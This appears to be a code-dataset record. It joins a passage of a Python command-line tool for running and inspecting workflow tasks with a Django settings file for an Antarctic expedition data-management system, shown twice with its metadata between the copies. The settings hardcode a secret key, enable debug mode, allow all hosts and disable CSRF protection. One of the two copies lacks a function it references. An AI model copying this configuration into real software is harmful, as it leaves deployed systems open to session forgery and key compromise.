Arg('--debug-exception', '-X', help=f'Launch {debug.__name__} on exception',
action='store_true'),
Arg('--no-colour', '-B', help='Black and white logging', action='store_true'),
]
run_ctrl_group = [
Arg('--force', '-f', action='store_true'),
Arg('--reasons', '-r', action='store_true'),
Arg('--executor', '-E', default='singleproc'),
Arg('--display', '-d', choices=['print_status', 'task_dag']),
]
task_filter_group = [
Arg('--filter'),
Arg('--rule'),
Arg('--requires-rerun', '-R', action='store_true'),
Arg('--uses-file', '-U'),
Arg('--produces-file', '-P'),
Arg('--ancestor-of', '-A', help='includes requested task'),
Arg('--descendant-of', '-D', help='includes requested task'),
]
ls_files_group = [
MutuallyExclusiveGroup(
Arg('--input', action='store_true'),
Arg('--output', action='store_true'),
Arg('--input-only', action='store_true'),
Arg('--output-only', action='store_true'),
Arg('--inout', action='store_true'),
),
Arg('--produced-by-rule'),
Arg('--used-by-rule'),
Arg('--produced-by-task'),
Arg('--used-by-task'),
]
sub_cmds = {
'run': {
'help': 'Run all pending tasks',
'args': [
Arg('remakefile', nargs='?', default='remakefile'),
Arg('--rescan-only', action='store_true', help='only rescan input files'),
Arg('--one', '-o', action='store_true', help='run one pending task'),
Arg('--random', action='store_true', help='run one (lucky dip!)'),
*run_ctrl_group,
],
},
'run-tasks': {
'help': 'Run specified tasks (uses same flags as ls-tasks)',
'args': [
Arg('remakefile', nargs='?', default='remakefile'),
Arg('--tasks', '-t', nargs='*'),
Arg('--handle-dependencies', '-H', action='store_true'),
*run_ctrl_group,
*task_filter_group,
]
},
'ls-rules': {
'help': 'List rules',
'args': [
Arg('remakefile', nargs='?', default='remakefile'),
Arg('--long', '-l', action='store_true'),
Arg('--filter', '-F', default=None),
Arg('--uses-file', '-U'),
Arg('--produces-file', '-P'),
]
},
'ls-tasks': {
'help': 'List tasks',
'args': [
Arg('remakefile', nargs='?', default='remakefile'),
Arg('--long', '-l', action='store_true'),
*task_filter_group,
]
},
'ls-files': {
'help': 'Remove files',
'args': [
Arg('remakefile', nargs='?', default='remakefile'),
Arg('--long', '-l', action='store_true'),
*ls_files_group,
Arg('--exists', action='store_true'),
]
},
'rm-files': {
'help': 'Remove files',
'args': [
Arg('remakefile', nargs='?', default='remakefile'),
Arg('--force', '-f', action='store_true'),
*ls_files_group,
]
},
'info': {
'help': 'Information about remakefile status',
'args': [
Arg('remakefile', nargs='?', default='remakefile'),
MutuallyExclusiveGroup(
Arg('--short', '-s', action='store_true'),
Arg('--long', '-l', action='store_true'),
),
Arg('--display', '-d', choices=['print_status', 'task_dag'],
default='print_status'),
]
},
'rule-info': {
'help': 'Information about rule',
'args': [
Arg('remakefile', nargs='?', default='remakefile'),
Arg('--long', '-l', action='store_true'),
Arg('rules', nargs='*'),
]
},
'task-info': {
'help': 'Information about task',
'args': [
Arg('remakefile', nargs='?', default='remakefile'),
Arg('--long', '-l', action='store_true'),
Arg('tasks', nargs='*'),
]
},
'file-info': {
'help': 'Information about file',
'args': [
Arg('--long', '-l', action='store_true'),
Arg('remakefile', nargs='?', default='remakefile'),
Arg('filenames', nargs='*'),
]
},
'monitor': {
'help': 'Monitor remake (polls remake metadata dir)',
'args': [
Arg('--timeout', '-t', help='timeout (s) to use for polling', default=10,
type=float),
Arg('remakefile', nargs='?', default='remakefile'),
]
},
'setup-examples': {
'help': 'Setup examples directory',
'args': [
Arg('--force', '-f', action='store_true'),
]
},
'version': {
'help': 'Print remake version',
'args': [
Arg('--long', '-l', action='store_true', help='long version'),
]
},
}
def __init__(self):
self.args = None
self.parser = self._build_parser()
def _build_parser(self):
parser = argparse.ArgumentParser(description='remake command line tool')
parser._actions[0].help = 'Show this help message and exit'
for argset in RemakeParser.args:
add_argset(parser, argset)
subparsers = parser.add_subparsers(dest='subcmd_name')
for cmd_key, cmd_kwargs in RemakeParser.sub_cmds.items():
args = cmd_kwargs['args']
subparser = subparsers.add_parser(cmd_key, help=cmd_kwargs['help'])
for argset in args:
add_argset(subparser, argset)
if argcomplete:
argcomplete.autocomplete(parser)
return parser
def parse_args(self, argv: Optional[Sequence[Text]] = ...) -> argparse.Namespace:
self.args = self.parser.parse_args(argv[1:])
return self.args
def dispatch(self):
args = self.args
# Dispatch command.
# N.B. args should always be dereferenced at this point,
# not passed into any subsequent functions.
if args.subcmd_name == 'run':
remake_run(args.remakefile, args.rescan_only, args.force, args.one, args.random,
args.reasons, args.executor, args.display)
elif args.subcmd_name == 'run-tasks':
remake_run_tasks(args.remakefile, args.tasks, args.handle_dependencies, args.force,
args.reasons, args.executor, args.display,
args.filter, args.rule,
args.requires_rerun, args.uses_file, args.produces_file,
args.ancestor_of, args.descendant_of)
elif args.subcmd_name == 'ls-rules':
ls_rules(args.remakefile, args.long, args.filter, args.uses_file, args.produces_file)
elif args.subcmd_name == 'ls-tasks':
ls_tasks(args.remakefile, args.long,
args.filter, args.rule,
args.requires_rerun, args.uses_file,
args.produces_file, args.ancestor_of, args.descendant_of)
elif args.subcmd_name in ['ls-files', 'rm-files']:
if args.input:
filetype = 'input'
elif args.output:
filetype = 'output'
elif args.input_only:
filetype = 'input_only'
elif args.output_only:
filetype = 'output_only'
elif args.inout:
filetype = 'inout'
else:
filetype = None
if args.subcmd_name == 'ls-files':
ls_files(args.remakefile, args.long, filetype, args.exists,
args.produced_by_rule, args.used_by_rule,
args.produced_by_task, args.used_by_task)
else:
rm_files(args.remakefile, args.force, filetype,
args.produced_by_rule, args.used_by_rule,
args.produced_by_task, args.used_by_task)
elif args.subcmd_name == 'info':
remakefile_info(args.remakefile, args.short, args.long, args.display)
elif args.subcmd_name == 'rule-info':
rule_info(args.remakefile, args.long, args.rules)
elif args.subcmd_name == 'task-info':
task_info(args.remakefile, args.long, args.tasks)
elif args.subcmd_name == 'file-info':
file_info(args.remakefile, args.filenames)
elif args.subcmd_name == 'monitor':
monitor(args.remakefile, args.timeout)
elif args.subcmd_name == 'setup-examples':
setup_examples(args.force)
elif args.subcmd_name == 'version':
print(get_version(form='long' if args.long else 'short'))
else:
assert False, f'Subcommand {args.subcmd_name} not recognized'
def _get_argparse_parser():
parser = RemakeParser()
return parser.parser
def remake_cmd(argv: Union[List[str], None] = None) -> None:
if argv is None:
argv = sys.argv
parser = RemakeParser()
args = parser.parse_args(argv)
if not args.subcmd_name:
parser.parser.print_help()
return 1
if args.debug_exception:
# Handle top level exceptions with a debugger.
sys.excepthook = exception_info
else:
sys.excepthook = log_error
loglevel = os.getenv('REMAKE_LOGLEVEL', None)
if loglevel is None:
if args.debug:
loglevel = 'DEBUG'
elif args.info:
loglevel = 'INFO'
elif args.warning:
loglevel = 'WARNING'
else:
# Do not output full info logging for -info commands. (Ironic?)
# Do not output full info logging for ls- commands.
if args.subcmd_name.endswith('-info') or args.subcmd_name.startswith('ls-'):
loglevel = 'WARNING'
else:
loglevel = 'INFO'
colour = not args.no_colour
if args.subcmd_name != 'monitor':
setup_stdout_logging(loglevel, colour=colour)
parser.dispatch()
def remake_run(remakefile, rescan_only, force, one, random, print_reasons, executor, display):
if force and (one or random):
raise ValueError('--force cannot be used with --one or --random')
remake = load_remake(remakefile).finalize()
remake.configure(print_reasons, executor, display)
remake.short_status()
if rescan_only:
remake.task_ctrl.run_rescan_only()
elif one:
remake.run_one()
elif random:
remake.run_random()
else:
remake.run_all(force=force)
if display == 'task_dag':
# Give user time to see final task_dag state.
sleep(3)
remake.short_status()
def remake_run_tasks(remakefile, task_path_hash_keys, handle_dependencies,
force, print_reasons, executor, display,
tfilter, rule,
requires_rerun, uses_file, produces_file,
ancestor_of, descendant_of):
remake = load_remake(remakefile).finalize()
remake.configure(print_reasons, executor, display)
remake.short_status()
if task_path_hash_keys and (tfilter or rule):
raise RemakeError('Can only use one of --tasks and (--filter or --rule)')
if task_path_hash_keys:
tasks = remake.find_tasks(task_path_hash_keys)
else:
if tfilter:
tfilter = dict([kv.split('=') for kv in tfilter.split(',')])
tasks = remake.list_tasks(tfilter, rule, requires_rerun, uses_file,
produces_file, ancestor_of, descendant_of)
remake.run_requested(tasks, force=force, handle_dependencies=handle_dependencies)
if display == 'task_dag':
# Give user time to see final task_dag state.
sleep(3)
remake.short_status()
def ls_rules(remakefile, long, tfilter, uses_file, produces_file):
# TODO: implement all args.
remake = load_remake(remakefile)
rules = remake.list_rules()
for rule in rules:
print(f'{rule.__name__}')
def ls_tasks(remakefile, long, tfilter, rule, requires_rerun, uses_file, produces_file,
ancestor_of, descendant_of):
remake = load_remake(remakefile).finalize()
if tfilter:
tfilter = dict([kv.split('=') for kv in tfilter.split(',')])
tasks = remake.list_tasks(tfilter, rule, requires_rerun, uses_file,
produces_file, ancestor_of, descendant_of)
tasks.status(long, long)
def ls_files(remakefile, long, filetype, exists,
produced_by_rule, used_by_rule, produced_by_task, used_by_task):
remake = load_remake(remakefile)
filelist = remake.list_files(filetype, exists,
produced_by_rule, used_by_rule, produced_by_task, used_by_task)
if long:
print(tabulate(filelist, headers=('path', 'filetype', 'exists')))
else:
for file, ftype, exists in filelist:
print(file)
def rm_files(remakefile, force, filetype,
produced_by_rule, used_by_rule, produced_by_task, used_by_task):
remake = load_remake(remakefile)
filelist = remake.list_files(filetype, True, produced_by_rule, used_by_rule,
produced_by_task, used_by_task)
if not filelist:
logger.info('No files to delete')
return
if force:
r = 'yes'
else:
r = input(bcolors.BOLD + bcolors.WARNING +
f'This will delete {len(filelist)} files, do you want to proceed? (yes/[no]): ' +
bcolors.ENDC)
if r != 'yes':
print('Not deleting files (yes not entered)')
return
for file, ftype, exists in filelist:
if ftype == 'input-only':
if force:
r = 'yes'
else:
r = input(bcolors.BOLD + bcolors.FAIL +
f'Are you sure you want to delete input-only file: {file}? (yes/[no]): ' +
bcolors.ENDC)
if r != 'yes':
print('Not deleting files (yes not entered)')
continue
logger.info(f'Deleting file: {file}')
file.unlink()
def remakefile_info(remakefile, short, long, display):
if display == 'print_status':
remake = load_remake(remakefile).finalize()
if short:
remake.short_status(mode='print')
else:
remake.tasks.status(long, long)
elif display == 'task_dag':
remake = load_remake(remakefile).finalize()
remake.display_task_dag()
else:
raise Exception(f'Unrecognized display: {display}')
def rule_info(remakefile, long, rule_names):
remake = load_remake(remakefile).finalize()
rules = remake.list_rules()
for rule_name in rule_names:
found = False
for rule in rules:
if rule.__name__ == rule_name:
print(rule)
found = True
break
if not found:
logger.error(f'No rule {rule_name} in {remake.name} found')
def task_info(remakefile, long, task_path_hash_keys):
remake = load_remake(remakefile).finalize()
info = remake.task_info(task_path_hash_keys)
for task_path_hash_key, (task, task_md, status) in info.items():
print(str(task))
print(status)
print(task_md.task_requires_rerun())
if long:
print('Uses files:')
for key, path in task.inputs.items():
print(f' {key}: {path}')
print('Produces files:')
for key, path in task.outputs.items():
print(f' {key}: {path}')
def file_info(remakefile, filenames):
remake = load_remake(remakefile).finalize()
info = remake.file_info(filenames)
for path, (path_md, produced_by_task, used_by_tasks) in info.items():
if path.exists():
print(f'exists: {path}')
else:
print(f'does not exist: {path}')
if not path_md:
print(f'Path not found in {remake.name}')
print()
continue
if produced_by_task:
print('Produced by:')
print(' ' + str(produced_by_task))
if used_by_tasks:
print('Used by:')
for task in used_by_tasks:
print(' ' + str(task))
if path.exists():
metadata_has_changed = path_md.compare_path_with_previous()
if metadata_has_changed:
print('Path metadata has changed since last use')
else:
print('Path metadata unchanged')
print()
def monitor(remakefile, timeout):
from curses import wrapper
remake = load_remake(remakefile)
remake.task_ctrl.build_task_DAG()
wrapper(remake_curses_monitor, remake, timeout)
def setup_examples(force):
import remake
logger.debug('Setting up examples')
new_examples_dir = 'remake-examples'
if not force:
r = input(f'Directory name [{new_examples_dir}]: ')
if r:
new_examples_dir = r
new_examples_dir = Path(new_examples_dir)
if new_examples_dir.exists():
if not force:
r = input(f'Overwrite examples in {new_examples_dir} y/[n]: ')
if r != 'y':
print('Exiting')
return
logger.debug(f'rm {new_examples_dir}')
shutil.rmtree(new_examples_dir)
new_examples_dir.mkdir(parents=True, exist_ok=True)
remake_dir = Path(remake.__file__).parent
examples_dir = remake_dir / 'examples'
cp_paths = sorted(examples_dir.glob('ex?.py'))
cp_paths.append(examples_dir / 'demo.py')
cp_paths.append(examples_dir / 'ex_slurm.py')
cp_paths.append(examples_dir / 'README.md')
cp_paths.append(examples_dir / 'Makefile')
for path in cp_paths:
new_path = new_examples_dir / path.name
logger.info(f'Copy {path} -> {new_path}')
shutil.copy(path, new_path)
data_dir = examples_dir / 'data'
new_data_dir = new_examples_dir / 'data'
logger.info(f'Copy {data_dir} -> {new_data_dir}')
shutil.copytree(data_dir, new_data_dir)
| 13,760 | 5,857 | 647 |
970a8fe9118aca227d5ddecdd61006a20022478a | 9,539 | py | Python | ScienceCruiseDataManagement/ScienceCruiseDataManagement/settings.py | Swiss-Polar-Institute/science-cruise-data-management | 67721a0f4a1255b8ac43e530ed95a8c324239c7c | [
"MIT"
] | 6 | 2017-10-06T09:18:04.000Z | 2022-02-10T08:54:56.000Z | ScienceCruiseDataManagement/ScienceCruiseDataManagement/settings.py | Swiss-Polar-Institute/science-cruise-data-management | 67721a0f4a1255b8ac43e530ed95a8c324239c7c | [
"MIT"
] | 12 | 2020-02-27T09:24:50.000Z | 2021-09-22T17:39:55.000Z | ScienceCruiseDataManagement/ScienceCruiseDataManagement/settings.py | Swiss-Polar-Institute/science-cruise-data-management | 67721a0f4a1255b8ac43e530ed95a8c324239c7c | [
"MIT"
] | 1 | 2017-10-16T13:49:33.000Z | 2017-10-16T13:49:33.000Z | """
Django settings for ScienceCruiseDataManagement project.
Generated by 'django-admin startproject' using Django 1.10.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
import datetime
import pathlib
# This file is part of https://github.com/cpina/science-cruise-data-management
#
# This project was programmed in a hurry without any prior Django experience,
# while circumnavigating the Antarctic on the ACE expedition, without proper
# Internet access, with 150 scientists using the system and doing at the same
# cruise other data management and system administration tasks.
#
# Sadly there aren't unit tests and we didn't have time to refactor the code
# during the cruise, which is really needed.
#
# Carles Pina (carles@pina.cat) and Jen Thomas (jenny_t152@yahoo.co.uk), 2016-2017.
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*gb+gevd#dx0euc(#$4ts!37w%9m#kbjlz_4k9@&62ok+=w_*2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# INTERNAL_IPS = ["127.0.0.1",]
INTERNAL_IPS = [] # Used by the Debugger console. The maps/some pages might not work
# offline because the debugger tries to load an external JQurey
# NOTE: by default this is an empty list. Check documentation.
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'import_export', # to export as CSV
'debug_toolbar',
'django_extensions',
'selectable', # auto-completion
'smart_selects', # foreign keys depending on other foreign keys
'ship_data',
'data_storage_management',
'main', # ScienceCruiseManagement main app
'metadata',
'ctd',
'underway_sampling',
'data_administration',
'expedition_reporting',
'spi_admin',
'data_management'
]
MIDDLEWARE = [
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware', TODO: reenable, test data_storage_management/views.py and the script
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ScienceCruiseDataManagement.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'main', 'templates'), os.path.join(BASE_DIR, 'metadata', 'templates'), os.path.join(BASE_DIR, 'expedition_reporting', 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ScienceCruiseDataManagement.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# This project could just use sqlite3 for testing purposes. Then
# the DATABASES dictionary would be like:
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
#
def secrets_file(file_name):
""" First try $HOME/.file_name, else tries /run/secrets/file_name, else raises an exception """
file_path_in_home_directory = os.path.join(str(pathlib.Path.home()), "." + file_name)
if os.path.exists(file_path_in_home_directory):
return file_path_in_home_directory
file_path_in_run_secrets = os.path.join("/run/secrets", file_name)
if os.path.exists(file_path_in_run_secrets):
return file_path_in_run_secrets
raise "Configuration for {} doesn't exist".format(file_name)
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'OPTIONS': {
'read_default_file': secrets_file("science_cruise_data_management_mysql.conf"),
'init_command': "SET sql_mode='STRICT_TRANS_TABLES'"
},
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
# So DATETIME_FORMAT is honored
USE_L10N = False
USE_TZ = True
# Datetime in list views in YYYY-MM-DD HH:mm::ss
DATETIME_FORMAT = "Y-m-d H:i:s"
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
# Should be moved out from here, just for development at the moment
BASE_STORAGE_DIRECTORY = '/mnt/ace_data'
# Added for the importer-exporter module
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
# Users that can add events should be in this Group (it's created by the command createdjangousers
ADD_EVENTS_GROUP = "Add events"
# Controlled vocabulary sources
VOCAB_SOURCES = (("seadatanet", "Sea Data Net"),
("seavox", "SeaVoX"),
("globalchangemasterdirectory", "Global Change Master Directory"),
("generatedforace", "Generated for ACE"),
("britishoceanographicdatacentre", "British Oceanographic Data Centre (BODC)"))
DEVICE_SOURCE_DEFAULT= "generatedforace"
UNCERTAINTY_DEFAULT = "britishoceanoraphicdatacentre"
VALIDITY_OPTIONS = (("valid", "valid"), ("redundant", "redundant"))
# JQUERY is loaded when necessary from the static files
USE_DJANGO_JQUERY = False
JQUERY_URL = '/static/js/external/jquery-1.12.0.min.js'
ADMIN_SITE_TITLE = 'ACE Data Admin'
ADMIN_SITE_HEADER = 'ACE Data Administration'
# This can be a symbolik link
DOCUMENTS_DIRECTORY = os.path.join(os.getenv("HOME"), "intranet_documents")
FORECAST_DIRECTORY = os.path.join(os.getenv("HOME"), "ethz_forecast_data")
MAIN_GPS = "GLONASS"
NAS_STAGING_MOUNT_POINT = "/mnt/ace_data"
NAS_IP = "192.168.20.2"
UPDATE_LOCATION_STATIONS_TYPES = ["marine"]
UPDATE_LOCATION_POSITION_UNCERTAINTY_NAME = "0.0 to 0.01 n.miles"
UPDATE_LOCATION_POSITION_SOURCE_NAME = "Ship's GPS"
# The following Event Action types will not be updated
UPDATE_LOCATION_POSITION_EXCEPTION_EVENT_ACTION_TYPE_ENDS_EXCEPTIONS = ["Sonobuoy"]
MAP_RESOLUTION_SECONDS = 1800
TRACK_MAP_FILEPATH = "/home/jen/projects/ace_data_management/data_requests/20171106_walton_distance_travelled/geojson_track/geojson.track"
IMAGE_RELOAD_FILEPATH = "/mnt/data_admin/latest_image/latest_image.jpg"
# For default options
DEFAULT_PLATFORM_NAME = "Akademik Treshnikov"
DEFAULT_MISSION_NAME = "Antarctic Circumnavigation Expedition"
DEFAULT_CTD_OPERATOR_FIRSTNAME = "Marie-Noelle"
DEFAULT_CTD_OPERATOR_LASTNAME = "Houssais"
EXPEDITION_SAMPLE_CODE = expedition_sample_code
MAXIMUM_EMAIL_SIZE = 435000 # bytes
# IMAP_SERVER = "192.168.20.40"
IMAP_SERVER = "46.226.111.64"
# DEFAULT VALUES FOR METADATA MODEL
DEFAULT_IN_GCMD = True
DEFAULT_IN_DATACITE = True
DEFAULT_METADATA_NAME = "CEOS IDN DIF"
DEFAULT_METADATA_VERSION = "VERSION 9.9"
DEFAULT_DATA_SET_LANGUAGE = "English"
METADATA_DEFAULT_PLATFORM_SHORT_NAME = ["R/V AT"]
METADATA_DEFAULT_PROJECT_SHORT_NAME = ["SPI-ACE"]
METADATA_DEFAULT_DATA_CENTER = ["SPI"]
METADATA_DEFAULT_IDN_NODE = ["AMD", "SOOS"]
METADATA_DEFAULT_CITATION_PUBLISHER = "SPI"
DATE_TWO_DAYS = datetime.datetime(2017, 2, 5)
try:
from local_settings import *
print('Imported local_settings')
except ImportError:
pass
| 33.470175 | 172 | 0.73037 | """
Django settings for ScienceCruiseDataManagement project.
Generated by 'django-admin startproject' using Django 1.10.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
import datetime
import pathlib
# This file is part of https://github.com/cpina/science-cruise-data-management
#
# This project was programmed in a hurry without any prior Django experience,
# while circumnavigating the Antarctic on the ACE expedition, without proper
# Internet access, with 150 scientists using the system and doing at the same
# cruise other data management and system administration tasks.
#
# Sadly there aren't unit tests and we didn't have time to refactor the code
# during the cruise, which is really needed.
#
# Carles Pina (carles@pina.cat) and Jen Thomas (jenny_t152@yahoo.co.uk), 2016-2017.
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*gb+gevd#dx0euc(#$4ts!37w%9m#kbjlz_4k9@&62ok+=w_*2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# INTERNAL_IPS = ["127.0.0.1",]
INTERNAL_IPS = [] # Used by the Debugger console. The maps/some pages might not work
# offline because the debugger tries to load an external JQurey
# NOTE: by default this is an empty list. Check documentation.
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'import_export', # to export as CSV
'debug_toolbar',
'django_extensions',
'selectable', # auto-completion
'smart_selects', # foreign keys depending on other foreign keys
'ship_data',
'data_storage_management',
'main', # ScienceCruiseManagement main app
'metadata',
'ctd',
'underway_sampling',
'data_administration',
'expedition_reporting',
'spi_admin',
'data_management'
]
MIDDLEWARE = [
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware', TODO: reenable, test data_storage_management/views.py and the script
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ScienceCruiseDataManagement.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'main', 'templates'), os.path.join(BASE_DIR, 'metadata', 'templates'), os.path.join(BASE_DIR, 'expedition_reporting', 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ScienceCruiseDataManagement.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# This project could just use sqlite3 for testing purposes. Then
# the DATABASES dictionary would be like:
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
#
def secrets_file(file_name):
""" First try $HOME/.file_name, else tries /run/secrets/file_name, else raises an exception """
file_path_in_home_directory = os.path.join(str(pathlib.Path.home()), "." + file_name)
if os.path.exists(file_path_in_home_directory):
return file_path_in_home_directory
file_path_in_run_secrets = os.path.join("/run/secrets", file_name)
if os.path.exists(file_path_in_run_secrets):
return file_path_in_run_secrets
raise "Configuration for {} doesn't exist".format(file_name)
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'OPTIONS': {
'read_default_file': secrets_file("science_cruise_data_management_mysql.conf"),
'init_command': "SET sql_mode='STRICT_TRANS_TABLES'"
},
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
# So DATETIME_FORMAT is honored
USE_L10N = False
USE_TZ = True
# Datetime in list views in YYYY-MM-DD HH:mm::ss
DATETIME_FORMAT = "Y-m-d H:i:s"
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
# Should be moved out from here, just for development at the moment
BASE_STORAGE_DIRECTORY = '/mnt/ace_data'
# Added for the importer-exporter module
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
# Users that can add events should be in this Group (it's created by the command createdjangousers
ADD_EVENTS_GROUP = "Add events"
# Controlled vocabulary sources
VOCAB_SOURCES = (("seadatanet", "Sea Data Net"),
("seavox", "SeaVoX"),
("globalchangemasterdirectory", "Global Change Master Directory"),
("generatedforace", "Generated for ACE"),
("britishoceanographicdatacentre", "British Oceanographic Data Centre (BODC)"))
DEVICE_SOURCE_DEFAULT= "generatedforace"
UNCERTAINTY_DEFAULT = "britishoceanoraphicdatacentre"
VALIDITY_OPTIONS = (("valid", "valid"), ("redundant", "redundant"))
# JQUERY is loaded when necessary from the static files
USE_DJANGO_JQUERY = False
JQUERY_URL = '/static/js/external/jquery-1.12.0.min.js'
ADMIN_SITE_TITLE = 'ACE Data Admin'
ADMIN_SITE_HEADER = 'ACE Data Administration'
# This can be a symbolik link
DOCUMENTS_DIRECTORY = os.path.join(os.getenv("HOME"), "intranet_documents")
FORECAST_DIRECTORY = os.path.join(os.getenv("HOME"), "ethz_forecast_data")
MAIN_GPS = "GLONASS"
NAS_STAGING_MOUNT_POINT = "/mnt/ace_data"
NAS_IP = "192.168.20.2"
UPDATE_LOCATION_STATIONS_TYPES = ["marine"]
UPDATE_LOCATION_POSITION_UNCERTAINTY_NAME = "0.0 to 0.01 n.miles"
UPDATE_LOCATION_POSITION_SOURCE_NAME = "Ship's GPS"
# The following Event Action types will not be updated
UPDATE_LOCATION_POSITION_EXCEPTION_EVENT_ACTION_TYPE_ENDS_EXCEPTIONS = ["Sonobuoy"]
MAP_RESOLUTION_SECONDS = 1800
TRACK_MAP_FILEPATH = "/home/jen/projects/ace_data_management/data_requests/20171106_walton_distance_travelled/geojson_track/geojson.track"
IMAGE_RELOAD_FILEPATH = "/mnt/data_admin/latest_image/latest_image.jpg"
# For default options
DEFAULT_PLATFORM_NAME = "Akademik Treshnikov"
DEFAULT_MISSION_NAME = "Antarctic Circumnavigation Expedition"
DEFAULT_CTD_OPERATOR_FIRSTNAME = "Marie-Noelle"
DEFAULT_CTD_OPERATOR_LASTNAME = "Houssais"
def expedition_sample_code(sample):
# From a sample returns the sample_code - from different fields
# from the Sample.
information={}
information['ship'] = sample.ship.shortened_name
information['cruise'] = sample.mission.acronym
information['leg'] = sample.leg.number
information['project_number'] = sample.project.number
information['event_number'] = sample.event.number
information['owner'] = sample.pi_initials.initials
information['number_of_sample'] = sample.id
padded_julian_day = "{:03}".format(sample.julian_day)
information['julian_day'] = padded_julian_day
expedition_sample_code = "{ship}/{cruise}/{leg}/{project_number}/{julian_day}/{event_number}/{owner}/{number_of_sample}".format(**information)
return expedition_sample_code
EXPEDITION_SAMPLE_CODE = expedition_sample_code
MAXIMUM_EMAIL_SIZE = 435000 # bytes
# IMAP_SERVER = "192.168.20.40"
IMAP_SERVER = "46.226.111.64"
# DEFAULT VALUES FOR METADATA MODEL
DEFAULT_IN_GCMD = True
DEFAULT_IN_DATACITE = True
DEFAULT_METADATA_NAME = "CEOS IDN DIF"
DEFAULT_METADATA_VERSION = "VERSION 9.9"
DEFAULT_DATA_SET_LANGUAGE = "English"
METADATA_DEFAULT_PLATFORM_SHORT_NAME = ["R/V AT"]
METADATA_DEFAULT_PROJECT_SHORT_NAME = ["SPI-ACE"]
